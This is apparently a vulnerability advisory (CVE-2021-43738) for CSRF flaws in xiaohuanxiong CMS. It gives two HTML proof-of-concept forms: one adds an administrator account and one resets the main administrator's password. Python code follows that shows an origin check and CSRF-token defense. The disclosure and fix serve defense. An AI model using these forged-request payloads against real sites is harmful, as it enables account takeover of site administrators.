CVE-2021-43738: There are two CSRF vulnerabilities that can add an administrator account and modify the administrator account's password · Issue #28 · hiliqi/xiaohuanxiong

An issue was discovered in xiaohuanxiong CMS 5.0.17. There is a CSRF vulnerability that can add an administrator account and modify the administrator account's password.

CVE
#csrf #vulnerability #java

After the administrator has logged in, open the following two pages and click the button; you can also use JavaScript to create a PoC that is triggered directly.
PoC one -> add new administrator account

<html>
  <body>
  <!-- PoC one: cross-site POST to the administrator creation endpoint -->
  <script>history.pushState('', '', '/')</script>
    <form action="http://xiaohuangxiong.test/admin.php/Admins/create.html" method="POST">
      <input type="hidden" name="username" value="admin2" />
      <input type="hidden" name="password" value="123456" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


<html>
  <body>
  <!-- PoC two: cross-site POST to the administrator edit endpoint (changes the password of account id 1) -->
  <script>history.pushState('', '', '/')</script>
    <form action="http://xiaohuangxiong.test/admin.php/Admins/edit.html" method="POST">
      <input type="hidden" name="id" value="1" />
      <input type="hidden" name="username" value="admin" />
      <input type="hidden" name="password" value="12345678" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
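Both PoCs work for the same reason: the admin endpoints accept any POST that carries the logged-in administrator's session cookie, and the browser attaches that cookie even when the form lives on another site. The following is an added defensive illustration, written for this page and not code from the xiaohuanxiong project or the issue author. It models the server-side gate a fix would put in front of state-changing admin routes such as Admins/create and Admins/edit: reject requests whose Origin (or Referer) is not the site's own origin, and require a per-session synchronizer token in the form. The site origin, the secret key, the session id, and the `_token` field name are constructed assumptions; the endpoint names and form fields come from the PoCs above.

```python
import hmac
import hashlib
from urllib.parse import urlsplit

# Constructed values for the demo; the real site would load these from config.
SITE_ORIGIN = "http://xiaohuangxiong.test"
SECRET_KEY = b"server-side-secret-for-demo-only"


def issue_csrf_token(session_id: str) -> str:
    """Derive the token the server embeds in its own admin forms.

    An HMAC over the session id is unforgeable without SECRET_KEY and
    needs no extra server-side storage (assumed design, not the CMS's own)."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def _origin_allowed(headers: dict) -> bool:
    """First layer: provenance check on Origin, falling back to Referer.

    Browsers send Origin on cross-origin form POSTs, so a form hosted on an
    attacker page arrives with that page's origin, not SITE_ORIGIN."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            # No provenance at all: refuse the state-changing request.
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == SITE_ORIGIN


def check_admin_mutation(method: str, headers: dict, form: dict, session_id: str):
    """Gate for state-changing admin routes (Admins/create, Admins/edit).

    Returns (allowed, reason). Order matters: the cheap origin check runs
    first, then the token comparison in constant time."""
    if method.upper() != "POST":
        return False, "method not allowed"
    if not _origin_allowed(headers):
        return False, "cross-site origin"
    submitted = form.get("_token", "")
    expected = issue_csrf_token(session_id)
    if not hmac.compare_digest(submitted, expected):
        return False, "missing or invalid CSRF token"
    return True, "ok"


def demo() -> dict:
    """Replay the shape of the PoC request and of a legitimate admin submission."""
    session = "sess-abc123"  # constructed session id of the logged-in admin

    # What PoC one produces: the session cookie rides along, but Origin is
    # the attacker's page and the form carries no token field.
    csrf_attempt = check_admin_mutation(
        "POST",
        {"Origin": "http://attacker.example"},
        {"username": "admin2", "password": "123456"},
        session,
    )

    # Same form submitted from the site's own admin page with the token
    # the server rendered into it.
    legitimate = check_admin_mutation(
        "POST",
        {"Origin": SITE_ORIGIN},
        {"username": "admin2", "password": "123456",
         "_token": issue_csrf_token(session)},
        session,
    )
    return {"csrf_attempt": csrf_attempt, "legitimate": legitimate}


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: allowed={result[0]} ({result[1]})")
```

The two checks are deliberately independent: the origin check stops the forms on this page on its own, and the token stops requests that arrive with a missing or stripped Origin and Referer. Setting the session cookie with `SameSite=Lax` adds a third layer, since the browser then omits the cookie on cross-site POSTs before the request ever reaches this code.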
